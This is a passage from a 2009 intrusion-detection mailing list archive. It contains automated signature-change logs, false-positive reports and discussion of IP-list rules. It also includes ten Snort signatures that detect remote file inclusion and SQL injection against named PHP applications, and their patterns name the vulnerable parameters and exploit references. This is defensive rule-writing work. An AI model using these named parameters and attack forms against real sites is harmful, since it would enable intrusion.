        2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From r.fulton at auckland.ac.nz  Sat May 23 06:26:37 2009
From: r.fulton at auckland.ac.nz (Russell Fulton)
Date: Sat, 23 May 2009 22:26:37 +1200
Subject: [Emerging-Sigs] search engine crawler FP for ET WEB_SPECIFIC Xoops
	SQL Injection Attempt -- print.php id UPDATE
Message-ID: <C46AD2FA-D2B6-4A0C-8F56-DD61EC3B726A@auckland.ac.nz>

Have a couple of web sites triggering this with two different crawlers.

R


META
--------
SID	CID	TimeStamp		Signature
6	3226808	2009-05-23 04:23:21	ET WEB_SPECIFIC Xoops SQL Injection  
Attempt -- print.php id UPDATE
Sig ID
2006491

Sensor Hostname				Sensor Interface
monitor-dmzo.isec.auckland.ac.nz	dmz sensor

IP
--------
Source Address	Dest Address	Ver	Hdr Len
65.55.211.160	130.216.33.86	4	5
TOS	length	ID	flags	offset	TTL	chksum
0	327	14981	2	0	116	4646

TCP
--------
Source Port	Dest Port	Seq		Ack		
14453		80		1746675607	806064331


DATA
--------
GET /mod/glossary/print.php?id=81&mode=date&hook=&sortkey=UP
DATE&sortorder=asc&offset=0 HTTP/1.1..Accept: */*..Host: icm
i.math.auckland.ac.nz..Accept-Encoding: gzip, deflate..From:
  msnbot(at)microsoft.com..User-Agent: msnbot/1.1 (+http://se
arch.msn.com/msnbot.htm)..Connection: Close....


From emerging at emergingthreats.net  Sat May 23 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 23 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090523200011.A933A4504B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sat May 23 16:00:11 2009 [***]

[*] Rules modifications: [*]
    None.

[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (44):
        2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (44):
        2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From emerging at emergingthreats.net  Sun May 24 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sun, 24 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090524200011.A47744504B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sun May 24 16:00:11 2009 [***]

[*] Rules modifications: [*]
    None.

[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (4):
        2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (4):
        2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From markus.lude at gmx.de  Sun May 24 20:01:51 2009
From: markus.lude at gmx.de (Markus Lude)
Date: Mon, 25 May 2009 02:01:51 +0200
Subject: [Emerging-Sigs] sig 2404007 FP?
Message-ID: <20090525000151.GA8855@fuseki.my.domain>

Hello,
I've hits on sig 2404007 (bot c&c) from 213.236.208.178. The IP address
resolves to {irc,list}.opera.com. Are there really problems with that
server? If yes, which one and did anyone try to resolve them? Or could
we just drop that address from the rule?

Regards,
Markus


From signatures at stillsecure.com  Mon May 25 09:16:47 2009
From: signatures at stillsecure.com (signatures)
Date: Mon, 25 May 2009 07:16:47 -0600
Subject: [Emerging-Sigs] StillSecure: 10 New Signatures - May-25-2009
Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C292F@webmail.latis.com>

Hi Matt,

Please find 10 New Signatures below:

1.       WEB-PHP Beerwins PHPLinkAdmin linkadmin.php page Parameter Remote File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Beerwins PHPLinkAdmin linkadmin.php page Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/linkadmin.php?"; nocase; uricontent:"page="; nocase; pcre:"/page=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8216; reference:bugtraq,34129; sid:2009079; rev:1;)



2.       WEB-PHP Beerwins PHPLinkAdmin edlink.php linkid Parameter SQL Injection
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Beerwins PHPLinkAdmin edlink.php linkid Parameter SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/edlink.php?"; nocase; uricontent:"linkid"; nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8216; reference:bugtraq,34129; sid:2009080; rev:1;)



3.       WEB-PHP EasySiteNetwork Riddles Complete Website riddle.php riddleid Parameter SQL Injection
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP EasySiteNetwork Riddles Complete Website riddle.php riddleid Parameter SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/riddle.php?"; nocase; uricontent:"riddleid="; nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,29966; reference:url,milw0rm.com/exploits/5946; sid:2009231; rev:1;)



4.       WEB-PHP cmsWorks lib.module.php mod_root Parameter Remote File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP cmsWorks lib.module.php mod_root Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/lib.module.php?"; nocase; uricontent:"mod_root"; nocase; pcre:"/mod_root=\s*(https?|ftps?|php)/Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/5921; reference:bugtraq,29914; sid:2009082; rev:1;)



5.       WEB-PHP DeluxeBB misc.php qorder Parameter SQL Injection
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP DeluxeBB misc.php qorder Parameter SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/misc.php?"; nocase; uricontent:"sub=memberlist"; nocase; uricontent:"qorder="; nocase; uricontent:"UNION"; nocase; uriconten
t:"SELECT"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,34174; reference:url,milw0rm.com/exploits/8240; sid:2009085; rev:1;)



6.       WEB-PHP Joomla Simple RSS Reader admin.rssreader.php mosConfig_live_site Parameter Remote File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Joomla Simple RSS Reader admin.rssreader.php mosConfig_live_site Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/admin.rssreader.php?"; nocase; uricontent:"mosConfig_live_site="; nocase; pcre:"/mosConfig_live_site=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,vupen.com/english/advisories/2008/3119; reference:bugtraq,32265; reference:url,milw0rm.com/exploits/7096; sid:2009242; rev:1;)



7.       WEB-PHP Boonex Dolphin HTMLSax3.php Remote File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Boonex Dolphin HTMLSax3.php Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/HTMLSax3.php?"; nocase; uricontent:"dir[plugins]="; nocase; pcre:"/dir\[plugins\]=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/6024; reference:bugtraq,30136; sid:2009108; rev:1;)



8.       WEB-PHP Boonex Dolphin safehtml.php Remote File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Boonex Dolphin safehtml.php Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/safehtml.php?"; nocase; uricontent:"dir[plugins]="; nocase; pcre:"/dir\[plugins\]=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/6024; reference:bugtraq,30136; sid:2009109; rev:1;)



9.       WEB-PHP Boonex Dolphin content.inc.php Remote File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Boonex Dolphin content.inc.php Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/inc/content.inc.php?"; nocase; uricontent:"sIncPath="; nocase; pcre:"/sIncPath=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/6024; reference:bugtraq,30136; sid:2009110; rev:1;)



10.   WEB-ATTACKS Symantec Norton Ghost EasySetupInt.dll ActiveX Multiple Remote Denial of Service
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Symantec Norton Ghost EasySetupInt.dll ActiveX Multiple Remote Denial of Service"; flow:to_client,established; content:"CLSID"; nocase; content:"7972D5BE-2213-4B28-884C-F8F82432EAA5"; nocase; distance:0; pcre:"/(SetupDeleteVolume|GetBackupLocationPath|CallUninstall|CanUseEasySetup|CallAddInitialProtection|CallTour)/i"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8523; reference:bugtraq,34696; sid:7499; rev:1;)



Looking forward for your comments, if any....

 
Thanks & Regards,
StillSecure
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090525/754bf007/attachment.html

From eoin.miller at trojanedbinaries.com  Mon May 25 12:59:54 2009
From: eoin.miller at trojanedbinaries.com (Eoin Miller)
Date: Mon, 25 May 2009 12:59:54 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A142D5E.4050201@jonkmans.com>
References: <4A131D81.3040907@jonkmans.com>	<4A133285.1060104@trojanedbinaries.com>	<4A13383B.1000608@jonkmans.com>	<4A136CA5.1080303@trojanedbinaries.com>
	<20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com>
Message-ID: <4A1ACE8A.2040205@trojanedbinaries.com>

Can't believe this didn't occur to me sooner, but if reversing the
flow/direction is really going to be a problem, why not look for the
response SYN/ACK packet instead of the initial SYN when setting up the
TCP connection?

alert tcp [<RBN IP LIST>] any -> $HOME_NET any (flags: SA;) = alert!
alert tcp $HOME_NET any -> [<RBN IP LIST>] any (flags: SA;) = nothing

Now back to memorial day yard work....

--
Eoin Miller


Matt Jonkman wrote:
> What if, ignoring the reversing homenet/extnet thing, we just go with
> flow:established on the tcp sigs and make it directionless?
>
> That'll eliminate a lot of the noise and only give you an alert when you
> have a box talking to them.
>
> Then we don't need to open a new sid range or reverse the directions, so
> no one has to redo blocking/response rules.
>
> Matt
>


From emerging at emergingthreats.net  Mon May 25 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Mon, 25 May 2009 16:00:12 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090525200012.140A84504C@goliath.jonkmans.com>


[***] Results from Oinkmaster started Mon May 25 16:00:11 2009 [***]

[*] Rules modifications: [*]
    None.

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (12):
        2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (12):
        2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
